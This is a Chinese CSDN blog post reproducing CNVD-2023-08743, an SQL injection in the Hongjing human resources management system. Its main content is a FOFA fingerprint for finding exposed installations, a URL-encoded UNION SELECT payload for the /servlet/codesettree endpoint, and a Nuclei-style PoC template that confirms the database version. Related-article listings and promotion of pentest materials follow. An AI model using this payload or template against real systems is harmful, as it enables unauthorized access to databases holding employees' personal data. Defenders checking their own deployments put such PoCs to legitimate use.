【漏洞复现】CNVD-2023-08743

最新推荐文章于 2024-07-24 19:15:29 发布
最新推荐文章于 2024-07-24 19:15:29 发布
阅读量236 收藏
点赞数
分类专栏: 漏洞复现 文章标签: hive hadoop 数据仓库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zkaqlaoniao/article/details/134154572
版权

【漏洞复现】

CNVD-2023-08743

【漏洞介绍】

Hongjing Human Resource Management System - SQL Injection

【指纹】

title=”人力资源信息管理系统”

【系统UI】

【payload】

/servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d

【Poc】

id: CNVD-2023-08743

info:
  name: Hongjing SQL Injection
  author: xxx
  severity: high
  description: /
  reference:
    - https://
  metadata:
    fofa-query: title="人力资源信息管理系统"
  tags: hongjing,hcm

http:
  - raw:
      - |
        GET /servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(header,"text/xml")'
          - 'contains_all(body,"TreeNode id=\"hongjing","SQL Server")'
        condition: and

 

图片

没看够~?欢迎关注!

免费领取安全学习资料包!(私聊进群一起学习,共同进步)

渗透工具

技术文档、书籍

 

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

 

应急响应笔记

学习路线

渗透测试老鸟-九青
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
宏景eHR SQL注入漏洞复现CNVD-2023-08743
0xSec
05-30 4889
宏景eHR 存在SQL注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。
CNVD-2023-08743宏景HCM SQL注入漏洞复现 [附POC]
薛定谔嘚喵博客
11-07 1929
宏景HCM系统 categories处存在SQL注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。
宏景HCM SQL注入漏洞(CNVD-2023-08743) ,hrms加解密工具
11-07
宏景HCM SQL注入漏洞(CNVD-2023-08743) ,hrms加解密工具。需要 Java1.8 环境,执行如下命令启动 HrmsTool 工具, -e 是加密, -d 是解密。 $ java -jar HrmsTool.jar Usage: java -jar HrmsTool.jar -e xxx java -jar HrmsTool.jar -d xxx
CNVD-2019-34241 SQL注入.MD
03-20
CNVD-2019-34241 SQL注入.MD
Apache Tomcat 文件包含漏洞CNVD-2020-10487,对应 CVE-2020-1938)
03-05
CNVD-2020-10487 和 CVE-2020-1938 是同一个安全漏洞的不同命名,这个漏洞被称为“Apache Tomcat 文件包含漏洞”。此漏洞的存在使得攻击者有可能通过精心构造的请求,将恶意代码注入到Tomcat服务器上,从而执行任意...
【1day】复现宏景HCM codesettree SQL注入漏洞CNVD-2023-08743
记录并分享学习安全的知识点..
07-26 1226
北京宏景世纪软件股份有限公司 HCM codesettree 接口存在SQL注入漏洞,攻击者通过漏洞可以获取到登陆系统的账号密码和数据库信息。
WuThreat身份安全云-TVD每日漏洞情报-2023-05-12
wuthreat无胁科技的博客
05-15 423
参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?漏洞编号:CVE-2023-2645。漏洞编号:CVE-2023-2598。
Servlet源码-tree结构
lansefanggezi123的博客
03-24 168
javax.servlet-api-3.0.1-sources.jar的结构: │ pom.xml │ ├─javax │ └─servlet │ │ AsyncContext.java │ │ AsyncEvent.java │ │ AsyncListener.java │ │ DispatcherType.java │ ...
漏洞都是怎么编号的CVE/CAN/BUGTRAQ/CNCVE/CNVD/CNNVD
热门推荐
aletero的专栏
05-08 1万+
在一些文章和报道中经常提到安全漏洞CVE-1999-1046这种CVE开头的漏洞编号,这篇文章将常见的漏洞ID的表示方法做下介绍:   1、以CVE开头,如CVE-1999-1046这种      CVE 的英文全称是“Common Vulnerabilities & Exposures”公共漏洞和暴露。CVE就好像是一个字典表,为广泛认同的信息安全漏洞或者已经暴露出来的弱点给出一个公共的名
漏洞复现宏景ehr-hcm-codesettree-sql注入
知黑而守白
03-11 154
宏景HCM系统是一款由宏景软件研发的系统,主要功能包括人员、组织机构、档案、合同、薪资、保险、绩效、考勤、招聘、培训、干部任免和人事流程等业务的管理,以及人事、绩效、培训、招聘、考勤等业务自助,还具备了报表功能和灵活的表格工具,支持集团管控、目标管理、领导决策等应用。该漏洞存在于宏景EHR人力资源管理系统的 codesettree 接口处,该功能存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
Servlet1-Servlet程序、请求处理、继承体系
m0_73902080的博客
07-24 615
Servlet是JavaEE规范之一,规范就是接口Servlet是JavaWeb三大组件之一,三大组件分别是:Servlet程序、Filter过滤器、Listener监听器Servlet是运行在服务器上的一个java小程序,它可以接收客户端发送过来的请求,并响应数据给客户端。
Hadoop 重要监控指标
weixin_41489908的博客
07-24 794
NameNode 指标:包括 NameNode 的状态、内存使用、文件系统操作等。DataNode 指标:包括 DataNode 的状态、磁盘使用、数据块操作等。ResourceManager 指标:包括 ResourceManager 的状态、应用程序队列、资源使用等。NodeManager 指标:包括 NodeManager 的状态、容器使用、资源分配等。JobHistoryServer 指标:包括历史作业的状态、执行时间、资源消耗等。
NO.1 Hadoop概述
2301_81838571的博客
07-23 305
1.1 Hadoop是什么 1.2 Hadoop优势 1.3 Hadoop组成 1.3.1 HDFS架构概述 1.3.2 YARN架构概述 1.3.3 MapReduce架构概述 1.3.4 HDFS、YARN、MapReduce三者关系 1.4大数据技术生态体系 1.5 推荐系统框架图
刷机维修进阶教程-----何谓“tee损坏” 指纹丢失 掉帧 传感器失效?详细修复步骤教程
最新发布
小马哥的专栏
07-24 534
TEE损坏指的是安卓机型中Key Attestation密钥认证所依赖的可信应用中的证书库被破坏了。然后拒绝为指纹密匙认证提供服务。加密的密匙由TEE负责管理。tee损坏只影响当前机型的密匙认证。不影响加密。通俗的理解。如果你机型维修或者刷机或者解锁等等后有异常掉帧 指纹异常 传感器异常或者网络 解锁故障等。那么有几率就是当前机型的tee损坏。 今天的博文具体解析tee损坏的具体原因 症状表现以及指令修复与工具修复的步骤 修复工具将在博文后面分享
如何选择适合的数据仓库ETL工具
weixin_72431427的博客
07-23 788
以两款常见的ETL工具——Informatica和Kettle为例,分享如何选择适合的ETL工具来支持数据仓库的构建和管理。
cnvd-2023-08743
08-20
cnvd-2023-08743是一个漏洞编号,对应的是一个存在于某个软件或系统中的安全漏洞。根据这个漏洞编号,我们可以查找相关的漏洞详情和修复建议。 漏洞编号通常由国家信息安全漏洞库(CNVD)分配,用于标识和跟踪安全漏洞。通过查找相关的漏洞报告,我们可以了解到这个漏洞的具体情况和影响范围。 对于cnvd-2023-08743这个具体漏洞,因为没有给出具体的信息,所以我们无法提供对其的详细回答。要了解更多关于这个漏洞的情况,可以在CNVD官方网站或其他漏洞报告平台上查询。在查找到相关的漏洞报告后,可以了解到这个漏洞的类型、危害程度和可能的攻击方式。 修复漏洞的方法通常包括修补软件或系统的安全漏洞、升级到最新的补丁版本、关闭漏洞影响的功能,在出现漏洞之前进行安全配置等。需要注意的是,修复漏洞时应当及时行动,并确保修复措施不会影响系统的正常运行。 最后,漏洞是网络安全的一个常见问题,及时了解和修复漏洞对保护我们的信息安全至关重要。我们应该保持对漏洞信息的关注,并采取必要的措施来保护自己的数据安全。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值